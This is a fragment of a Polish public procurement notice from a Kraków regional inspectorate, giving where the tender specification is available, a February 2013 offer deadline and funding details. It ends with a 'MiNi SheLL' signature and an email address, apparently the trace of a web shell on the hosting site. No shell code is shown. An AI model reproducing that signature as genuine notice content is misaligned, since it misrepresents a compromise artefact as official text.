<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2013 godzina 08:00, miejsce: w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com